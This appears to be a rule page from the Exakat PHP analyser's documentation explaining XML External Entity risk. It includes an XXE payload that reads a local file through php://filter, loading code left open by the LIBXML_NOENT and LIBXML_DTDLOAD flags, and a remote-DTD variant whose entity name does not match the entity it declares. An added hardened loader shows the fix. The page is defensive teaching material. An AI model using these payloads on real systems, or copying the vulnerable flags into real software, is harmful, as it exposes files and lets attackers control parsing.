.. _security-nonetforxmlload:
.. _no-net-for-xml-load:

No Net For Xml Load
+++++++++++++++++++

SimpleXML and ext/DOM load all external entities from the web, by default. This is dangerous, in particular when loading unknown XML code.

Look at the XML code below: it is valid. It defines an entity ``xxe``, which is filled with a file read on the system and base64 encoded::

   <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
   <replace>&xxe;</replace>

This file could be processed with the following code. Note that ``index.php`` in the above entity can be replaced by any valid file path.

.. code-block:: php

   <?php

   $dom = new DOMDocument();
   $dom->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD);
   $info = simplexml_import_dom($dom);
   print base64_decode($info[0]);
   ?>

Here, PHP loads the XML document, finds the entity, then resolves it by reading and base64-encoding a file called ``index.php``. The source code of that file is now used as data in the XML document.

At that point, the example illustrates how an XXE works: the XML engine is used to load external resources while preprocessing the XML code. In fact, only one change is needed to make this XML code arbitrarily injected::

   <!DOCTYPE replace [<!ENTITY writer SYSTEM "https://www.example.com/entities.dtd"> ]>
   <replace>&xxe;</replace>

In the above example, the XML code is static (it never changes), but the ``xxe`` definitions are loaded from a remote website, and are completely under the attacker's control.

See also *XML External Entity*, *XML External Entity (XXE) Processing* and *Detecting and exploiting XXE in SAML Interfaces*.
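A hardened counterpart to the loading code above, as an added example (this is not code from the Exakat rule page or the Exakat project): it applies the two fixes this rule asks for, refusing entity declarations and denying the XML engine any network or external-resource access, and shows the hostile document being rejected while a benign one still parses. The function name ``loadXmlSafely`` and the two sample documents are assumptions of the example.

```php
<?php
// Added example, not from the Exakat rule page or the Exakat project:
// a hardened loader that applies both suggestions of this rule
// (no entity substitution, no network) to untrusted XML.
// loadXmlSafely() and the sample documents below are the example's own.

declare(strict_types=1);

// Process-wide: whatever flags a later parse passes, libxml must not fetch
// external DTDs or entities. Returning null makes every lookup fail.
libxml_set_external_entity_loader(
    static function (?string $publicId, ?string $systemId, array $context) {
        return null;
    }
);
// PHP < 8.0 additionally needs this; the function is deprecated on 8.0+.
if (PHP_VERSION_ID < 80000) {
    libxml_disable_entity_loader(true);
}

function loadXmlSafely(string $xml): DOMDocument
{
    // Reject any DTD up front: an internal subset is where an inline
    // <!ENTITY ... SYSTEM "..."> declaration would live.
    if (stripos($xml, '<!DOCTYPE') !== false) {
        throw new InvalidArgumentException('DOCTYPE declarations are not accepted');
    }

    $previous = libxml_use_internal_errors(true);   // collect errors, no warnings

    $dom = new DOMDocument();
    // LIBXML_NONET forbids network access during the parse.
    // LIBXML_NOENT and LIBXML_DTDLOAD (used in the vulnerable snippet above)
    // are deliberately absent: entities stay unsubstituted, no DTD is loaded.
    $ok = $dom->loadXML($xml, LIBXML_NONET);

    $errors = libxml_get_errors();
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    if ($ok === false || $errors !== []) {
        $messages = array_map(static fn (LibXMLError $e): string => trim($e->message), $errors);
        throw new RuntimeException('XML rejected: ' . implode('; ', $messages));
    }

    return $dom;
}

// Constructed inputs: the XXE shape shown on this page, and a benign document.
$hostile = '<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>'
         . '<replace>&xxe;</replace>';
$benign  = '<order><item sku="A-1" qty="2"/></order>';

try {
    loadXmlSafely($hostile);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}

$dom = loadXmlSafely($benign);
echo 'accepted root element: ', $dom->documentElement->tagName, PHP_EOL;
```

The ``DOCTYPE`` check is a coarse pre-filter that gives a clear error message; the real guard is the combination of the null entity loader, the absence of ``LIBXML_NOENT`` and ``LIBXML_DTDLOAD``, and ``LIBXML_NONET``, which together leave the parser nothing to fetch even if a DTD reaches it. Install the entity loader once at application bootstrap rather than per call, since it is global to the process.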
Connex PHP features
-------------------

+ xml

Suggestions
___________

* Strip out any entity when using external XML
* Forbid any network access to the XML engine, by configuring it without network access

Specs
_____

+--------------+----------------------------------+
| Short name   | Security/NoNetForXmlLoad         |
+--------------+----------------------------------+
| Rulesets     | All, Changed Behavior, Security  |
+--------------+----------------------------------+
| Exakat since | 1.0.11                           |
+--------------+----------------------------------+
| PHP Version  | All                              |
+--------------+----------------------------------+
| Severity     | Major                            |
+--------------+----------------------------------+
| Time To Fix  | Slow (1 hour)                    |
+--------------+----------------------------------+
| Precision    | High                             |
+--------------+----------------------------------+
| Available in | Entreprise Edition, Exakat Cloud |
+--------------+----------------------------------+